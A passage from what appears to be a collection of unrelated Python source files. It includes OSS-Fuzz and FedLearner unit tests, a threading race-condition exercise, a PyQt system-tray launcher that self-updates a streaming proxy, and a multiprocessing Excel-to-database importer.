{'test1': '0 8 * * *'},
{project.name: project.schedule for project in projects_query})
def test_get_projects_yaml(self):
"""Testing get_projects() yaml get_schedule()."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'dir', 'projects/test1', [
Repository('Dockerfile', 'file', 'projects/test1/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test1/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(b'builds_per_day: 2')
repo.contents[1].contents[1].set_yaml_contents(b'builds_per_day: 3')
self.assertEqual(
get_projects(repo), {
'test0': ProjectMetadata('0 6,18 * * *'),
'test1': ProjectMetadata('0 6,14,22 * * *')
})
def test_get_projects_no_docker_file(self):
"""Testing get_projects() with missing dockerfile"""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'dir', 'projects/test1')
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_get_projects_invalid_project_name(self):
"""Testing get_projects() with invalid project name"""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1@', 'dir', 'projects/test1', [
Repository('Dockerfile', 'file', 'projects/test1/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_get_projects_non_directory_type_project(self):
"""Testing get_projects() when a file in projects/ is not of type 'dir'."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'file', 'projects/test1')
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_invalid_yaml_format(self):
"""Testing invalid yaml schedule parameter argument."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(
b'builds_per_day: some-string')
self.assertEqual(get_projects(repo), {})
def test_yaml_out_of_range(self):
"""Testing invalid yaml schedule parameter argument."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(b'builds_per_day: 5')
self.assertEqual(get_projects(repo), {})
def test_get_access_token(self):
"""Testing get_access_token()."""
client = ndb.Client()
with client.context():
self.assertRaises(RuntimeError, get_access_token)
@classmethod
def tearDownClass(cls):
# TODO: replace this with a cleaner way of killing the process
os.system('pkill -f datastore')
if __name__ == '__main__':
unittest.main(exit=False)
|
wd.py
|
"""
MDH backend containers healthcheck worker
"""
import threading
from worker import elsa_docker_event_worker, elsa_health_check_worker
if __name__ == '__main__':
elsa_docker_worker = threading.Thread(target=elsa_docker_event_worker)
elsa_docker_worker.start()
elsa_health_check_worker()
|
exercise_2.py
|
import threading
from exercises.utils import fuzzy
rabbits_colony_size: int = 0
def rabbit_counter(number_of_rabbits: int):
global rabbits_colony_size
fuzzy()
rabbits_colony_size += number_of_rabbits
fuzzy()
print(f'Now we have {rabbits_colony_size} rabbits')
fuzzy()
print('---------------')
fuzzy()
for _ in range(10):
threading.Thread(target=rabbit_counter, args=[1]).start()
fuzzy()
print('All rabbits are counted')
fuzzy()
|
test_data_join_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.mysql_client import DBClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
def setUp(self):
db_database = 'test_mysql'
db_addr = 'localhost:2379'
db_username_l = 'test_user_l'
db_username_f = 'test_user_f'
db_password_l = 'test_password_l'
db_password_f = 'test_password_f'
db_base_dir_l = 'byefl_l'
db_base_dir_f= 'byefl_f'
data_source_name = 'test_data_source'
kvstore_l = DBClient(db_database, db_addr, db_username_l,
db_password_l, db_base_dir_l, True)
kvstore_f = DBClient(db_database, db_addr, db_username_f,
db_password_f, db_base_dir_f, True)
kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
data_source_l = common_pb.DataSource()
self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
data_source_l.role = common_pb.FLRole.Leader
data_source_l.state = common_pb.DataSourceState.Init
data_source_l.output_base_dir = "./ds_output_l"
self.raw_data_dir_l = "./raw_data_l"
data_source_f = common_pb.DataSource()
self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
data_source_f.role = common_pb.FLRole.Follower
data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
data_source_f.state = common_pb.DataSourceState.Init
data_source_f.output_base_dir = "./ds_output_f"
self.raw_data_dir_f = "./raw_data_f"
data_source_meta = common_pb.DataSourceMeta()
data_source_meta.name = data_source_name
data_source_meta.partition_num = 2
data_source_meta.start_time = 0
data_source_meta.end_time = 100000000
data_source_l.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_l, data_source_l)
data_source_f.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_f, data_source_f)
self.kvstore_l = kvstore_l
self.kvstore_f = kvstore_f
self.data_source_l = data_source_l
self.data_source_f = data_source_f
self.data_source_name = data_source_name
self.db_database = db_database
self.db_addr = db_addr
self.db_username_l = db_username_l
self.db_username_f = db_username_f
self.db_password_l = db_password_l
self.db_password_f = db_password_f
self.db_base_dir_l = db_base_dir_l
self.db_base_dir_f = db_base_dir_f
self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
self.kvstore_l, self.raw_data_pub_dir_l
)
self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
self.kvstore_f, self.raw_data_pub_dir_f
)
if gfile.Exists(data_source_l.output_base_dir):
gfile.DeleteRecursively(data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(data_source_f.output_base_dir):
gfile.DeleteRecursively(data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.worker_options = dj_pb.DataJoinWorkerOptions(
use_mock_etcd=True,
raw_data_options=dj_pb.RawDataOptions(
raw_data_iter='TF_RECORD',
read_ahead_size=1<<20,
read_batch_size=128
),
example_id_dump_options=dj_pb.ExampleIdDumpOptions(
example_id_dump_interval=1,
example_id_dump_threshold=1024
),
example_joiner_options=dj_pb.ExampleJoinerOptions(
example_joiner='STREAM_JOINER',
min_matching_window=64,
max_matching_window=256,
data_block_dump_interval=30,
data_block_dump_threshold=1000
),
batch_processor_options=dj_pb.BatchProcessorOptions(
batch_size=512,
max_flying_item=2048
),
data_block_builder_options=dj_pb.WriterOptions(
output_writer='TF_RECORD'
)
)
self.total_index = 1 << 12
def generate_raw_data(self, start_index, kvstore, rdp, data_source, raw_data_base_dir, partition_id,
block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
raw_data_dir = os.path.join(raw_data_base_dir,
common.partition_repr(partition_id))
if not gfile.Exists(raw_data_dir):
gfile.MakeDirs(raw_data_dir)
useless_index = 0
new_raw_data_fnames = []
for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
builder = DataBlockBuilder(
raw_data_base_dir,
data_source.data_source_meta.name,
partition_id, block_index,
dj_pb.WriterOptions(output_writer='TF_RECORD'), None
)
cands = list(range(block_index * block_size, (block_index + 1) * block_size))
start_index = cands[0]
for i in range(len(cands)):
if random.randint(1, 4) > 2:
continue
a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
if a < 0:
a = 0
if a >= len(cands):
a = len(cands) - 1
if b < 0:
b = 0
if b >= len(cands):
b = len(cands) - 1
if (abs(cands[a]-i-start_index) <= shuffle_win_size and
abs(cands[b]-i-start_index) <= shuffle_win_size):
cands[a], cands[b] = cands[b], cands[a]
for example_idx in cands:
feat = {}
example_id = '{}'.format(example_idx).encode()
feat['example_id'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[example_id]))
event_time = 150000000 + example_idx
feat['event_time'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[event_time]))
feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[feat_val_fmt.format(example_idx).encode()]))
example = tf.train.Example(features=tf.train.Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
useless_index, useless_index)
useless_index += 1
meta = builder.finish_data_block()
fname = common.encode_data_block_fname(
data_source.data_source_meta.name,
meta
)
new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
fpaths = [os.path.join(raw_data_dir, f)
for f in gfile.ListDirectory(raw_data_dir)
if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
for fpath in fpaths:
if fpath.endswith(common.DataBlockMetaSuffix):
gfile.Remove(fpath)
rdp.publish_raw_data(partition_id, new_raw_data_fnames)
def test_all_assembly(self):
for i in range(3):
logging.info('Testing round %d', i + 1)
self._inner_test_round(i*self.total_index)
def _inner_test_round(self, start_index):
for i in range(self.data_source_l.data_source_meta.partition_num):
self.generate_raw_data(
start_index, self.kvstore_l, self.raw_data_publisher_l,
self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
'leader_key_partition_{}'.format(i) + ':{}',
'leader_value_partition_{}'.format(i) + ':{}'
)
self.generate_raw_data(
start_index, self.kvstore_f, self.raw_data_publisher_f,
self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
'follower_key_partition_{}'.format(i) + ':{}',
'follower_value_partition_{}'.format(i) + ':{}'
)
master_addr_l = 'localhost:4061'
master_addr_f = 'localhost:4062'
master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
batch_mode=True)
master_l = data_join_master.DataJoinMasterService(
int(master_addr_l.split(':')[1]), master_addr_f,
self.data_source_name, self.db_database, self.db_base_dir_l,
self.db_addr, self.db_username_l, self.db_password_l,
master_options,
)
master_l.start()
master_f = data_join_master.DataJoinMasterService(
int(master_addr_f.split(':')[1]), master_addr_l,
self.data_source_name, self.db_database, self.db_base_dir_f,
self.db_addr, self.db_username_f, self.db_password_f,
master_options
)
master_f.start()
channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Processing and \
dss_f.state == common_pb.DataSourceState.Processing:
break
except Exception as e:
pass
time.sleep(2)
worker_addr_l = 'localhost:4161'
worker_addr_f = 'localhost:4162'
worker_l = data_join_worker.DataJoinWorkerService(
int(worker_addr_l.split(':')[1]),
worker_addr_f, master_addr_l, 0,
self.db_database, self.db_base_dir_l,
self.db_addr, self.db_username_l,
self.db_password_l, self.worker_options
)
worker_f = data_join_worker.DataJoinWorkerService(
int(worker_addr_f.split(':')[1]),
worker_addr_l, master_addr_f, 0,
self.db_database, self.db_base_dir_f,
self.db_addr, self.db_username_f,
self.db_password_f, self.worker_options
)
th_l = threading.Thread(target=worker_l.run, name='worker_l')
th_f = threading.Thread(target=worker_f.run, name='worker_f')
th_l.start()
th_f.start()
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Ready and \
dss_f.state == common_pb.DataSourceState.Ready:
break
except Exception as e: #xx
pass
time.sleep(2)
th_l.join()
th_f.join()
master_l.stop()
master_f.stop()
def tearDown(self):
if gfile.Exists(self.data_source_l.output_base_dir):
gfile.DeleteRecursively(self.data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(self.data_source_f.output_base_dir):
gfile.DeleteRecursively(self.data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(self.db_base_dir_f))
self.kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(self.db_base_dir_l))
if __name__ == '__main__':
unittest.main()
|
sstvLauncher.py
|
import sys, signal, os, urllib, subprocess, json, logging, ntpath, platform, requests, shutil, threading, multiprocessing
from PyQt4 import QtGui, QtCore
if platform.system() == 'Linux': print("To run without terminal launch using 'nohup ./sstvLauncher &'")
from logging.handlers import RotatingFileHandler
# Setup logging
log_formatter = logging.Formatter(
'%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsLauncher ')
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
# Console logging
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
# Rotating Log Files
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
maxBytes=1024 * 1024 * 2,
backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
self.initVariables()
QtGui.QSystemTrayIcon.__init__(self,icon,parent)
self.menu = QtGui.QMenu(parent)
self.createMenu()
self.setContextMenu(self.menu)
self.set_icon()
if self.start:
logger.info("Launching YAP!")
self.tray_start()
else:
logger.info("not launching")
def createMenu(self,update=False):
if update: self.menu.clear()
if self.start:
openAction = self.menu.addAction('Open YAP')
QtCore.QObject.connect(openAction, QtCore.SIGNAL('triggered()'), self.tray_open)
terminalAction = self.menu.addAction('Show Terminal')
QtCore.QObject.connect(terminalAction, QtCore.SIGNAL('triggered()'), self.showTerminal)
else:
startAction = self.menu.addAction('Start YAP')
QtCore.QObject.connect(startAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
self.menu.addSeparator()
checkAction = self.menu.addAction('Check for Updates')
QtCore.QObject.connect(checkAction, QtCore.SIGNAL('triggered()'), self.tray_check_update)
updateAction = self.menu.addAction('Update')
QtCore.QObject.connect(updateAction, QtCore.SIGNAL('triggered()'), self.tray_update)
if self.start:
restartAction = self.menu.addAction('Restart YAP')
QtCore.QObject.connect(restartAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
branchAction = self.menu.addAction('Switch Master/Dev')
QtCore.QObject.connect(branchAction, QtCore.SIGNAL('triggered()'), self.tray_branch)
logAction = self.menu.addAction('Open Logs')
QtCore.QObject.connect(logAction, QtCore.SIGNAL('triggered()'), self.tray_logs)
cacheAction = self.menu.addAction('Clear Cache')
QtCore.QObject.connect(cacheAction, QtCore.SIGNAL('triggered()'), self.tray_cache)
exitAction = self.menu.addAction('Exit')
QtCore.QObject.connect(exitAction, QtCore.SIGNAL('triggered()'), self.on_exit)
def initVariables(self):
self.type = ""
self.version = float("0.0")
self.latestVersion = float("0.0")
# Branch Master = True
self.branch = True
self.yap = None
self.LISTEN_IP = '127.0.0.1'
self.LISTEN_PORT = 6969
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
self.start = False
self.validIcon = QtGui.QIcon("logo_tray.ico")
self.updateIcon = QtGui.QIcon("logo_tray-update.ico")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "version" in config:
self.version = config["version"]
if "type" in config:
self.type = config["type"]
if "branch" in config:
self.branch = config["branch"] == True
self.assign_latestFile()
self.check_install()
self.start = True
except:
urllib.request.urlretrieve('https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico'))
urllib.request.urlretrieve(
'https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray-update.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray-update.ico'))
self.detect_install()
self.assign_latestFile()
self.version = float(self.version)
logger.debug("Settings complete")
return
def closeEvent(self, event):
if self.okayToClose():
#user asked for exit
self.trayIcon.hide()
event.accept()
else:
#"minimize"
self.hide()
self.trayIcon.show() #thanks @mojo
event.ignore()
def __icon_activated(self, reason):
if reason in (QtGui.QSystemTrayIcon.Trigger, QtGui.QSystemTrayIcon.DoubleClick):
logger.info("double clicked")
self.show()
def on_exit(self):
if self.yap: self.yap.terminate()
self.exit()
def exit(self):
QtCore.QCoreApplication.exit()
def showTerminal(self):
import time
import select
if platform.system() == 'Linux':
#subprocess.Popen(args, stdout=subprocess.PIPE)
try:
subprocess.Popen(["gnome-terminal -e 'bash -c \"tail -F ./nohup.out; exec bash\"'"], shell=True)
except:
subprocess.Popen(["lxterminal -e 'bash -c \"tail -F ./nohup.out; exec bash\"'"], shell=True)
return
f = subprocess.Popen(['tail','-F','nohup.out'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p = select.poll()
p.register(f.stdout)
while True:
if p.poll(1):
print(f.stdout.readline())
time.sleep(1)
elif platform.system() == 'Windows':
a=1
elif platform.system() == 'Darwin':
a=1
def gather_yap(self):
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
logger.debug("No config file found.")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "ip" in config and "port" in config:
self.LISTEN_IP = config["ip"]
self.LISTEN_PORT = config["port"]
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
logger.debug("Using config file.")
except:
pass
def tray_update(self):
if self.version < self.latestVersion:
# todo make update link
self.shutdown(update=True, restart=True)
self.set_icon()
else:
icon = os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico')
hover_text = 'YAP' + ' - No Update Available'
self.set_icon()
def set_icon(self):
logger.info("set icon")
if self.version < self.latestVersion:
icon = os.path.abspath('logo_tray-update.ico')
hover_text = 'YAP' + ' - Update Available!'
self.setIcon(self.updateIcon)
else:
icon = os.path.abspath('logo_tray.ico')
hover_text = 'YAP'
self.setIcon(self.validIcon)
logger.info("icon 2")
return
def detect_install(self):
logger.info("Detect install")
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
logger.info("Detect python")
self.type = ""
return
elif platform.system() == 'Linux':
self.type = "Linux/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
logger.info("Detect linux exe")
return
elif platform.system() == 'Windows':
self.type = "Windows/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
logger.info("Detect win exe")
return
elif platform.system() == 'Darwin':
self.type = "Macintosh/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
logger.info("Detect mac exe")
return
logger.info('installing')
self.assign_latestFile()
self.shutdown(update=True, install=True)
def check_install(self):
logger.debug("Check install")
if self.type == "" and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
return
elif self.type == "Linux/" and platform.system() == 'Linux' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
return
elif self.type == "Windows/" and platform.system() == 'Windows'and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
return
elif self.type == "Macintosh/" and platform.system() == 'Darwin' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
return
logger.info('Installing YAP %s' % self.type)
self.assign_latestFile()
self.shutdown(update=True)
def assign_latestFile(self):
if self.type == "": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/sstvProxy.py"
elif self.type == "Linux/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Linux/sstvProxy"
elif self.type == "Windows/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Windows/sstvproxy.exe"
elif self.type == "Macintosh/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Macintosh/sstvproxy"
self.url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % self.type
try:
self.latestVersion = float(requests.get(self.url).json()['Version'])
except:
self.latestVersion = float(0.0)
logger.info("Latest version check failed, check internet.")
logger.info(self.url)
def tray_open(self):
self.launch_browser()
def tray_check_update(self):
try:
latest_ver = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
if self.version < latest_ver:
logger.info("Update Available. You are on v%s with v%s available." % (self.version, latest_ver))
else:
logger.info("Proxy is up to date!")
def save_data(self):
logger.info("Saving data")
config = {'version':self.version,'type':self.type,'branch':self.branch}
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json'), 'w') as fp:
json.dump(config, fp)
def tray_start(self):
if self.type == "":
import sstvProxy
self.yap = multiprocessing.Process(target=sstvProxy.main)
self.yap.start()
elif self.type == "Linux/": subprocess.Popen(os.path.abspath("sstvProxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#elif self.type == "Linux/": os.spawnl(sys.executable, os.path.abspath("sstvProxy"))
elif self.type == "Windows/": subprocess.Popen([".\sstvproxy.exe", "-d"], cwd=os.getcwd())
elif self.type == "Macintosh/": subprocess.Popen(os.path.abspath("sstvproxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE) #os.execv(sys.executable, ["./sstvproxy", "-d"])
self.start = True
self.createMenu(True)
def tray_restart(self):
self.shutdown(restart=True)
def tray_quit(self):
self.shutdown()
def tray_cache(self):
shutil.rmtree(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), ignore_errors=True)
def tray_logs(self):
try:
import webbrowser
webbrowser.open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'))
except Exception as e:
logger.error(u"Could not open logs: %s" % e)
def tray_branch(self):
self.branch = not self.branch
self.shutdown(update=True, restart=True)
def launch_browser(self):
try:
import webbrowser
self.gather_yap()
webbrowser.open('%s%s' % (self.SERVER_HOST,'/sstv/index.html'))
except Exception as e:
logger.error(u"Could not launch browser: %s" % e)
def shutdown(self, restart=False, update=False, install=False):
logger.info(u"Stopping YAP web server...")
if self.type == 'Windows/':
os.system("taskkill /F /im sstvProxy.exe")
elif self.type == 'Linux/':
import psutil
PROCNAME = "sstvProxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.type == 'Macintosh/':
import psutil
PROCNAME = "sstvproxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.yap:
self.yap.terminate()
self.yap = None
if update:
logger.info(u"YAP is updating...")
url = self.latestfile.format(branch='master' if self.branch else 'dev')
try:
newfilename = ntpath.basename(url)
logger.debug("downloading %s to %s" % (url,os.path.join(os.path.dirname(sys.argv[0]), newfilename)))
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
except Exception as e:
os.system("taskkill /F /im sstvProxy.exe")
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
logger.info("Update forced")
logger.debug("Gathering version")
self.version = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
self.save_data()
if install and platform.system() == 'Linux':
os.chmod(os.path.join(os.path.dirname(sys.argv[0]), ntpath.basename(url)), 0o777)
if restart:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(u"YAP is restarting...")
self.tray_start()
def main():
app = QtGui.QApplication(sys.argv)
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon('logo_tray.ico'), w)
signal.signal(signal.SIGINT, signal.SIG_DFL)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
excelParserProcess.py
|
import functools
from multiprocessing import Pool
import multiprocessing
import threading
from threading import Thread
import string
import time
import numpy as np
import pandas as pd
from pandas import DataFrame, Series
from sqlalchemy.orm import scoped_session
from sqlalchemy.exc import IntegrityError, ProgrammingError
from pubsub import pub
from odm2api.models import Base, TimeSeriesResultValues, TimeSeriesResults, Units, setSchema
from odm2api.ODMconnection import dbconnection
from yodatools.excelparser.sessionWorker import SessionWorker
mute_x = multiprocessing.Lock()
print_lock = threading.Lock()
def update_output_text(message):
"""
Updates the Textctrl output window on the summary page
:param message:
:return:
"""
message += '\n'
pub.sendMessage('controller.update_output_text', message=message)
def commit_tsrvs(session, tsrvs):
"""
commits TimeSeriesResultValues to database
:param session: an instance of `sqlalchemy.orm.Session`
:param tsrvs: a list of TimeSeriesResultValues
:return: None
"""
session.add_all(tsrvs)
try:
session.commit()
except (IntegrityError, ProgrammingError):
session.rollback()
for i in xrange(0, len(tsrvs)):
tsrv = tsrvs[i]
session.add(tsrv)
try:
session.commit()
except (IntegrityError, ProgrammingError) as e:
session.rollback()
mute_x.acquire()
print(e)
mute_x.release()
update_output_text('Error: %s' % e.message)
def p_target(queue, conn, thread_count): # type: (multiprocessing.JoinableQueue, str) -> None
session_factory = dbconnection.createConnectionFromString(conn)
engine = session_factory.engine
setSchema(engine)
Base.metadata.create_all(engine)
scoped_session_ = session_factory.Session # type: scoped_session
while True:
args = queue.get()
if args:
# create worker threads
workers = [None] * thread_count
tsrvs_split = np.array_split(args, thread_count)
for i in range(len(tsrvs_split)):
worker = SessionWorker(scoped_session_, print_lock, mute_x, target=commit_tsrvs, args=tsrvs_split[i].tolist())
worker.daemon = True
worker.start()
workers[i] = worker
# it's probably best to wait for these threads to finish before moving on...
for w in workers:
w.join()
queue.task_done()
def start_procs(conn, processes=1, threads=1): # type: (str, int, int) -> multiprocessing.Queue
"""
Starts background processes and returns a queue
:param conn: connection string to create database connections for each process
:param processes: the number of processes to create
:param threads: the number of threads per process to create
:return: a queue object used to send work to each process
"""
q = multiprocessing.JoinableQueue()
# create processes
procs = [None] * processes
for i in range(0, processes):
p = multiprocessing.Process(target=p_target, args=(q, conn, threads), name=string.letters[i])
p.daemon = True
procs[i] = p
# start each process
for p in procs:
p.start()
return q
|
__main__.py
|
from multiprocessing import Process, Value, Array
from helper_modules.continuous_queue import ContinuousQueue as Queue
from ctypes import c_bool
from pexpect import pxssh
import sys
import numpy as np
from audio._audio_routine import audio_routine
from video._video_routine import video_routine
from server._server_routine import server_routine
from control._control_routine import control_routine
from scipy.io import loadmat
# BEWARE! This code cannot be run from an IDE, as using an editor such as IPython
# prevents multiprocessing. Use command prompt or a similar environment, or run
# directly by python.exe
if __name__ == '__main__':
# Initialize queues. Frame and Audio queues are connected to server process,
# but rgb and thermal frames are also fed into to control process via
# rgb_thermal_queue
